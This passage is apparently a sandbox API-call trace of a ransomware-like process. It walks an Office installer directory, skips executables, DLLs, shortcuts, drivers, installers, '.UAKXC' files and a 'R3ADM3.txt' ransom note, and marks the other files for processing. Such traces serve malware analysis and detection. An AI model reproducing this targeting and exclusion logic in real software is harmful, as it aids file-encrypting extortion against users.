[0148.891] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0148.891] lstrcmpW (lpString1="dwtrig20.exe", lpString2=".") returned 1 [0148.891] lstrcmpW (lpString1="dwtrig20.exe", lpString2="..") returned 1 [0148.891] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".UAKXC") returned 0x0 [0148.891] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".exe") returned=".exe" [0148.891] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0148.891] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2=".") returned 1 [0148.891] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="..") returned 1 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".UAKXC") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".exe") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".dll") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".lnk") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".sys") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".msi") returned 0x0 [0148.891] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch="R3ADM3.txt") returned 0x0 [0148.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0148.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf811c0 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81288 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeada8 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81350 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf81288 | out: hHeap=0xea0000) returned 1 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.892] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0148.892] lstrcmpW (lpString1="msvcr90.dll", lpString2=".") returned 1 [0148.892] lstrcmpW (lpString1="msvcr90.dll", lpString2="..") returned 1 [0148.892] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".UAKXC") returned 0x0 [0148.892] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".exe") returned 0x0 [0148.892] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".dll") returned=".dll" [0148.892] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0148.892] lstrcmpW (lpString1="OfficeLR.cab", lpString2=".") returned 1 [0148.892] lstrcmpW (lpString1="OfficeLR.cab", lpString2="..") returned 1 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".UAKXC") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".exe") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".dll") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".lnk") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".sys") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".msi") returned 0x0 [0148.892] StrStrIW (lpFirst="OfficeLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead58 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.892] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.893] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeead58 | out: hHeap=0xea0000) returned 1 [0148.893] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.893] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead58 [0148.893] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6a78 [0148.893] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.893] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.893] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0148.893] lstrcmpW (lpString1="OfficeMUI.msi", lpString2=".") returned 1 [0148.893] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="..") returned 1 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".UAKXC") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".exe") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".dll") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".lnk") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".sys") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".msi") returned=".msi" [0148.893] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0148.893] lstrcmpW (lpString1="OfficeMUI.xml", lpString2=".") returned 1 [0148.893] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="..") returned 1 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".UAKXC") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".exe") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".dll") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".lnk") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".sys") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".msi") returned 0x0 [0148.893] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.893] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead80 [0148.893] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.894] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.894] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.894] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeead80 | out: hHeap=0xea0000) returned 1 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead80 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6b20 [0148.894] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.894] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.894] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0148.894] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2=".") returned 1 [0148.894] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="..") returned 1 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".UAKXC") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".exe") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".dll") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".lnk") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".sys") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".msi") returned=".msi" [0148.894] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0148.894] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2=".") returned 1 [0148.894] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="..") returned 1 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".UAKXC") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".exe") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".dll") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".lnk") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".sys") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".msi") returned 0x0 [0148.894] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.894] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.895] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.895] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.895] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6bc8 [0148.895] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.895] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.895] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0148.895] lstrcmpW (lpString1="osetupui.dll", lpString2=".") returned 1 [0148.895] lstrcmpW (lpString1="osetupui.dll", lpString2="..") returned 1 [0148.895] StrStrIW (lpFirst="osetupui.dll", lpSrch=".UAKXC") returned 0x0 [0148.895] StrStrIW (lpFirst="osetupui.dll", lpSrch=".exe") returned 0x0 [0148.895] StrStrIW (lpFirst="osetupui.dll", lpSrch=".dll") returned=".dll" [0148.895] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0148.895] lstrcmpW (lpString1="pss10r.chm", lpString2=".") returned 1 [0148.895] lstrcmpW (lpString1="pss10r.chm", lpString2="..") returned 1 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".UAKXC") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".exe") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".dll") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".lnk") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".sys") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch=".msi") returned 0x0 [0148.895] StrStrIW (lpFirst="pss10r.chm", lpSrch="R3ADM3.txt") returned 0x0 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.895] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.896] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.896] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.896] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.896] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0148.896] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.896] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0148.896] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6c70 [0148.896] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.896] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.896] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc2eb90, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5dc2eb90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5dc2eb90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0148.896] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0148.896] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0148.896] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0148.896] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0148.896] lstrcmpW (lpString1="setup.chm", lpString2=".") returned 1 [0148.896] lstrcmpW (lpString1="setup.chm", lpString2="..") returned 1 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".UAKXC") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".exe") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".dll") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".lnk") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".sys") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch=".msi") returned 0x0 [0148.896] StrStrIW (lpFirst="setup.chm", lpSrch="R3ADM3.txt") returned 0x0 [0148.896] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3050 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3050 | out: hHeap=0xea0000) returned 1 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3050 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6d18 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.897] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0148.897] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0148.897] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0148.897] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3028 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.897] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.897] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3028 | out: hHeap=0xea0000) returned 1 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3028 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6dc0 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.898] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0148.898] lstrcmpW (lpString1="ShellUI.MST", lpString2=".") returned 1 [0148.898] lstrcmpW (lpString1="ShellUI.MST", lpString2="..") returned 1 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".UAKXC") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".exe") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".dll") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".lnk") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".sys") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".msi") returned 0x0 [0148.898] StrStrIW (lpFirst="ShellUI.MST", lpSrch="R3ADM3.txt") returned 0x0 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2dd0 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, 